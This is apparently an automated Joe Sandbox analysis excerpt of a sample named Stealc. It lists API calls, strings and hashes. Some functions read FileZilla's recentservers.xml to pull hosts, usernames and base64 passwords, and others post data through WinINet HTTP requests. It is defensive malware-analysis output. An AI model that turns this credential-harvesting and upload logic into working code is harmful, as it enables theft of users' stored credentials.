lstrcatA.KERNEL32(?,01780FA8,?,00F261C4,?), ref: 00F17BB8
lstrcatA.KERNEL32(?,01781008,?,00F261C4,?), ref: 00F17BCC
lstrcatA.KERNEL32(?,01781050,?,00F261C4,?), ref: 00F17BDF
lstrcatA.KERNEL32(?,017819B8,?,00F261C4,?), ref: 00F17BF3
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17C07
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17C1B
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17C2F
lstrcatA.KERNEL32(?,01780F00,?,00F261C4,?), ref: 00F17C43
lstrcatA.KERNEL32(?,01780FA8,?,00F261C4,?), ref: 00F17C56
lstrcatA.KERNEL32(?,01781008,?,00F261C4,?), ref: 00F17C6A
lstrcatA.KERNEL32(?,01781050,?,00F261C4,?), ref: 00F17C7E

Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020,00F317FC,00F17C90,80000001,00F261C4,?,?,?,?,?,00F17C90,?,?,00F261C4), ref: 00F17606
Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020,00000000,00000000), ref: 00F17648
Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020, : ), ref: 00F1765A
Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020,00000000,00000000,00000000), ref: 00F1768F
Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020,00F31804), ref: 00F176A0
Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020,00000000,00000000,00000000), ref: 00F176D3
Part of subcall function 00F175D0: lstrcatA.KERNEL32(2DD78020,00F31808), ref: 00F176ED
Part of subcall function 00F175D0: task.LIBCPMTD ref: 00F176FB

lstrcatA.KERNEL32(?,0177DFF8,?,00000104), ref: 00F17E0B
lstrcatA.KERNEL32(?,01781528), ref: 00F17E1E
lstrlenA.KERNEL32(2DD78020), ref: 00F17E2B
lstrlenA.KERNEL32(2DD78020), ref: 00F17E3B

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 07feafa7e0fd7520a0c5b534294db788f0dd75a8f4e15900b3c28bb42f8ad817
Instruction ID: d56cf120830d0395d09922c49b1ad02301c1ec09ba200a6038330bb4885a47c1
Opcode Fuzzy Hash: 07feafa7e0fd7520a0c5b534294db788f0dd75a8f4e15900b3c28bb42f8ad817
Instruction Fuzzy Hash: 8E321CB2840354ABCB25EBA0EC85DEE777CBB44741F044A98F21963084EE79E7C69F51

Function 00F20250 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F28DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F199EC
Part of subcall function 00F199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F19A11
Part of subcall function 00F199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F19A31
Part of subcall function 00F199C0: ReadFile.KERNEL32(000000FF,?,00000000,00F202E7,00000000), ref: 00F19A5A
Part of subcall function 00F199C0: LocalFree.KERNEL32(00F202E7), ref: 00F19A90
Part of subcall function 00F199C0: CloseHandle.KERNEL32(000000FF), ref: 00F19A9A

Part of subcall function 00F28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28E52

strtok_s.MSVCRT ref: 00F2031B
GetProcessHeap.KERNEL32(00000000,000F423F,00F30DBA,00F30DB7,00F30DB6,00F30DB3), ref: 00F20362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB2), ref: 00F20369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00F20385
lstrlenA.KERNEL32(00000000), ref: 00F20393

Part of subcall function 00F288E0: malloc.MSVCRT ref: 00F288E8
Part of subcall function 00F288E0: strncpy.MSVCRT ref: 00F28903

StrStrA.SHLWAPI(00000000,<Port>), ref: 00F203CF
lstrlenA.KERNEL32(00000000), ref: 00F203DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00F20419
lstrlenA.KERNEL32(00000000), ref: 00F20427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F20463
lstrlenA.KERNEL32(00000000), ref: 00F20475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB2), ref: 00F20502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00F2051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00F20532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00F2054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00F20562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00F20571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00F20580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00F20593
lstrcatA.KERNEL32(?,00F31678,?,?,00000000), ref: 00F205A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00F205B5
lstrcatA.KERNEL32(?,00F3167C,?,?,00000000), ref: 00F205C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00F205D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00F205E6
lstrcatA.KERNEL32(?,00F31688,?,?,00000000), ref: 00F205F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00F20604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00F20617
lstrcatA.KERNEL32(?,00F31698,?,?,00000000), ref: 00F20626
lstrcatA.KERNEL32(?,00F3169C,?,?,00000000), ref: 00F20635
strtok_s.MSVCRT ref: 00F20679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB2), ref: 00F2068E
memset.MSVCRT ref: 00F206DD

Strings

url: , xrefs: 00F20577
<Port>, xrefs: 00F203C6
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00F202A4
login: , xrefs: 00F205CA
<Pass encoding="base64">, xrefs: 00F2045A
<Host>, xrefs: 00F2037C
password: , xrefs: 00F205FB
profile: null, xrefs: 00F20568
browser: FileZilla, xrefs: 00F20559
<User>, xrefs: 00F20410

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: 96c1627f16ee711b34cdda29fb2e15983060b8dcebd929568a5cb69fb0632227
Instruction ID: c0ef15eb6b958e4c954395037aed66e7f49f53000c98bc2cf680808eeb524548
Opcode Fuzzy Hash: 96c1627f16ee711b34cdda29fb2e15983060b8dcebd929568a5cb69fb0632227
Instruction Fuzzy Hash: 31D13F72900218ABCB14EBF4ED96EEE7778FF14301F404518F512A7085EF79AA46EB61

Function 00F15100 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F147EA
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14801
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14818
Part of subcall function 00F147B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00F14839
Part of subcall function 00F147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14849

lstrlenA.KERNEL32(00000000), ref: 00F15193

Part of subcall function 00F28EA0: CryptBinaryToStringA.CRYPT32(00000000,00F15184,40000001,00000000,00000000,?,00F15184), ref: 00F28EC0

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F15207
StrCmpCA.SHLWAPI(?,0177E098), ref: 00F15225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F15340
HttpOpenRequestA.WININET(00000000,0177E018,?,01781C78,00000000,00000000,00400100,00000000), ref: 00F153A4

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,01782478,00000000,?,01774B80,00000000,?,00F319DC,00000000,?,00F251CF), ref: 00F15737
lstrlenA.KERNEL32(00000000), ref: 00F1574B
GetProcessHeap.KERNEL32(00000000,?), ref: 00F1575C
HeapAlloc.KERNEL32(00000000), ref: 00F15763
lstrlenA.KERNEL32(00000000), ref: 00F15778
memcpy.MSVCRT(?,00000000,00000000), ref: 00F1578F
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00F157A9
memcpy.MSVCRT(?), ref: 00F157B6
lstrlenA.KERNEL32(00000000), ref: 00F157C8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00F157E1
memcpy.MSVCRT(?), ref: 00F157F1
lstrlenA.KERNEL32(00000000,?,?), ref: 00F1580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F15822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F1584D
InternetCloseHandle.WININET(00000000), ref: 00F158B1
InternetCloseHandle.WININET(00000000), ref: 00F158BE
InternetCloseHandle.WININET(00000000), ref: 00F158C8

Strings

------, xrefs: 00F1563B
", xrefs: 00F15706
------, xrefs: 00F15297
--, xrefs: 00F15280
------, xrefs: 00F153B7
------, xrefs: 00F154F9
", xrefs: 00F15482
", xrefs: 00F155C4

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: d80092f732a3d02ee3918247350f524debf17b2e799c28b42bc56fb6359ba03c
Instruction ID: ac64e03de29ebd43545b2afae8a77c87a9ce07612992fcc515e72f80aacb7e93
Opcode Fuzzy Hash: d80092f732a3d02ee3918247350f524debf17b2e799c28b42bc56fb6359ba03c
Instruction Fuzzy Hash: 16323571921128EBDB14EBA0EC92FEE7378BF54700F404159F11667092EF786A89DF61

Function 00F15960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F147EA
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14801
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14818
Part of subcall function 00F147B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00F14839
Part of subcall function 00F147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14849

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F159F8
StrCmpCA.SHLWAPI(?,0177E098), ref: 00F15A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F15B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01782578,00000000,?,01774B80,00000000,?,00F31A1C), ref: 00F15E71
lstrlenA.KERNEL32(00000000), ref: 00F15E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00F15E93
HeapAlloc.KERNEL32(00000000), ref: 00F15E9A
lstrlenA.KERNEL32(00000000), ref: 00F15EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00F15EC6
lstrlenA.KERNEL32(00000000), ref: 00F15ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00F15EF1
memcpy.MSVCRT(?), ref: 00F15EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00F15F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F15F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F15F4C
InternetCloseHandle.WININET(00000000), ref: 00F15FB0
InternetCloseHandle.WININET(00000000), ref: 00F15FBD
HttpOpenRequestA.WININET(00000000,0177E018,?,01781C78,00000000,00000000,00400100,00000000), ref: 00F15BF8

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

InternetCloseHandle.WININET(00000000), ref: 00F15FC7

Strings

------, xrefs: 00F15D4C
------, xrefs: 00F15A96
------, xrefs: 00F15C0B
", xrefs: 00F15E16
", xrefs: 00F15CD5

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: 72378313794c4b27d4fc2a8876cd387f8a25fcfcc1170d15c4bcf5e67bd050c0
Instruction ID: f3ca5efa15d2846e2d544e1534e6b6ba4616dbac35f31fadf59d5f4e2ac5bbdf
Opcode Fuzzy Hash: 72378313794c4b27d4fc2a8876cd387f8a25fcfcc1170d15c4bcf5e67bd050c0
Instruction Fuzzy Hash: 29120171820128EBDB15EBA0EC95FEE7378BF14700F5041A9F10667091EF746A8ADF65

Function 00F1A790 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 538
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2AA70: StrCmpCA.SHLWAPI(00000000,00F31470,00F1D1A2,00F31470,00000000), ref: 00F2AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F1AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 00F1AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 00F1ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1A8B0

Part of subcall function 00F2A820: lstrlenA.KERNEL32(00000000,?,?,00F25B54,00F30ADB,00F30ADA,?,?,00F26B16,00000000,?,017703D0,?,00F3110C,?,00000000), ref: 00F2A82B
Part of subcall function 00F2A820: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A885

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

lstrcatA.KERNEL32(?,00000000,00000000,0177DDB8,00F31318,0177DDB8,00F31314), ref: 00F1ACEB
lstrcatA.KERNEL32(?,00F31320), ref: 00F1ACFA
lstrcatA.KERNEL32(?,00000000), ref: 00F1AD0D
lstrcatA.KERNEL32(?,00F31324), ref: 00F1AD1C
lstrcatA.KERNEL32(?,00000000), ref: 00F1AD2F
lstrcatA.KERNEL32(?,00F31328), ref: 00F1AD3E
lstrcatA.KERNEL32(?,00000000), ref: 00F1AD51
lstrcatA.KERNEL32(?,00F3132C), ref: 00F1AD60
lstrcatA.KERNEL32(?,00000000), ref: 00F1AD73
lstrcatA.KERNEL32(?,00F31330), ref: 00F1AD82
lstrcatA.KERNEL32(?,00000000), ref: 00F1AD95
lstrcatA.KERNEL32(?,00F31334), ref: 00F1ADA4
lstrcatA.KERNEL32(?,00000000), ref: 00F1ADB7
lstrlenA.KERNEL32(?), ref: 00F1AE0D
lstrlenA.KERNEL32(?), ref: 00F1AE1C
memset.MSVCRT ref: 00F1AE6B

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F19E10: memcmp.MSVCRT(?,v20,00000003), ref: 00F19E2D

DeleteFileA.KERNEL32(00000000), ref: 00F1AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00F1ABD4

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
